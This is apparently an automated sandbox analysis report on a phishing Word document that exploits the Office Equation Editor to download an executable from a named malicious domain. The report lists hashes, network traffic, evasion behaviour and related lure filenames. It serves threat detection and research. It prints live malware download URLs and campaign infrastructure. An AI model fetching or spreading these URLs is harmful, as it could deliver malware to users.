Play interactive tour

Edit tour

Analysis Report PAYMENT DETAILS .doc

Overview

General Information

Sample Name:	PAYMENT DETAILS .doc
Analysis ID:	350297
MD5:	d87b7d6a8a6e8e14862a3b86b83c86fb
SHA1:	3bb19190fd9e216a4d9876252b51ad33a187b2b6
SHA256:	32c9e90e2cf72e2da62927932d952513ad1e6c1d2b0ba606a200e03cd06f9cc9
Tags:	doc
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2304 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 1976 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 43.252.37.193, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	Avira URL Cloud: Label: malware
Source: http://globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: globalteamacademy.com

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: PAYMENT DETAILS .doc	Virustotal: Detection: 46%			Perma Link
Source: PAYMENT DETAILS .doc	ReversingLabs: Detection: 44%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: globalteamacademy.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 43.252.37.193:80

Networking:

Source: Joe Sandbox View

IP Address: 43.252.37.193 43.252.37.193

Source: Joe Sandbox View

ASN Name: NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud

Source: global traffic	HTTP traffic detected: GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.globalteamacademy.com

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B24BF0-30CA-4646-ACFF-79FC9E14ADCB}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: globalteamacademy.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.globalteamacademy.com

Source: unknown

DNS traffic detected: queries for: globalteamacademy.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 09 Feb 2021 06:46:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.globalteamacademy.com/wp-json/>; rel="https://api.w.org/"Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 32 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73

System Summary:

Source: classification engine

Classification label: mal76.expl.winDOC@3/7@5/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$YMENT DETAILS .doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCC53.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: PAYMENT DETAILS .doc	Virustotal: Detection: 46%
Source: PAYMENT DETAILS .doc	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1296

Thread sleep time: -240000s >= -30000s

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol13	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection1	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PAYMENT DETAILS .doc	47%	Virustotal		Browse
PAYMENT DETAILS .doc	45%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
globalteamacademy.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	100%	Avira URL Cloud	malware
http://globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
globalteamacademy.com	43.252.37.193	true	true	8%, Virustotal, Browse	unknown
www.globalteamacademy.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	true	Avira URL Cloud: malware	unknown
http://globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.252.37.193	unknown	Malaysia		45144	NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	350297
Start date:	09.02.2021
Start time:	07:45:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PAYMENT DETAILS .doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.expl.winDOC@3/7@5/1
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:45:38	API Interceptor	417x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
43.252.37.193	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	globalteamacademy.com/showcase/pal/TrC86HH4pxVZ49N.exe
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	globalteamacademy.com/showcase/bill/6vWjC1g7qA0Z76f.exe
	Request- NAVALTECH.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/zic/KlalU0GjxacVNEE.exe
	Quotation-20441.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	globalteamacademy.com/docct/uzz/E6RVLMWo0fz1jFA.exe
	New ORDER 092134..doc	Get hash	malicious	Browse	globalteamacademy.com/docct/dj/fBqZ0SFcHFfoBIY.exe
	RFQ A50924-E001.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/zi/SAM.exe
	quotation085312456.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/pll/PALLS.exe
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	globalteamacademy.com/epl/ja/JASP.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
globalteamacademy.com	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	43.252.37.193
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud	Revised Purchase Order 1214.doc	Get hash	malicious	Browse	43.252.37.193
	INQUIRY_RFQ_20210208.doc	Get hash	malicious	Browse	43.252.37.193
	Request- NAVALTECH.doc	Get hash	malicious	Browse	43.252.37.193
	Quotation-20441.doc	Get hash	malicious	Browse	43.252.37.193
	PROFORMA INVOICE-09765434.doc	Get hash	malicious	Browse	43.252.37.193
	New ORDER 092134..doc	Get hash	malicious	Browse	43.252.37.193
	RFQ A50924-E001.doc	Get hash	malicious	Browse	43.252.37.193
	quotation085312456.doc	Get hash	malicious	Browse	43.252.37.193
	STEELWORKS RFQ-38166.doc	Get hash	malicious	Browse	43.252.37.193
	PAYMENT 25SW Aug-06-2018.doc	Get hash	malicious	Browse	182.239.42.250

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24B24BF0-30CA-4646-ACFF-79FC9E14ADCB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C2D3EB9C-AB70-4784-8852-5C03B64EE05D}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.907713344717602
Encrypted:	false
SSDEEP:	6:4uWnwvFb46NgREqAWlgFJU//jlll8vlw2FrA:FNvFb4ek5uFJUXbuvq2ZA
MD5:	1EA49DE39B6C15457114A1218300637C
SHA1:	EA35C1FE9EFD4B05D6D801BEC4A39B75C5275C78
SHA-256:	7B839150185D5B0B90A4EC3832A0CC53843A08145B4D90A3F4AF82D5F06439AF
SHA-512:	49486D9D629AE4FAD026275E2D90DC2BADF757462DE899DEE905A7028483E587E637EF143F9B767B9683E461F2CAE1E79163381EACE42FF6C3D82F9C89A8A478
Malicious:	false
Reputation:	low
Preview:	. . . . . . . . . . . . . . .7.2.0.5.2.7.0.8.u.r.t.f.7.5.1.9.2.6.4.4.8.9.8.\.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...............................................................................................................................................................................................................................................................................................................................................................................................................P...V.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PAYMENT DETAILS .LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Feb 9 14:45:36 2021, length=168836, window=hide
Category:	dropped
Size (bytes):	2088
Entropy (8bit):	4.595829008305284
Encrypted:	false
SSDEEP:	24:8zIR/XTd6jFyo5Sej+fDv3qKdM7dD2zIR/XTd6jFyo5Sej+fDv3qKdM7dV:8zi/XT0jF3YmBKQh2zi/XT0jF3YmBKQ/
MD5:	8363E43EFFBD5645BC8B5CDF97F2582F
SHA1:	751F6EEAA0C9A0059875D10C7BFC9438534A0D2F
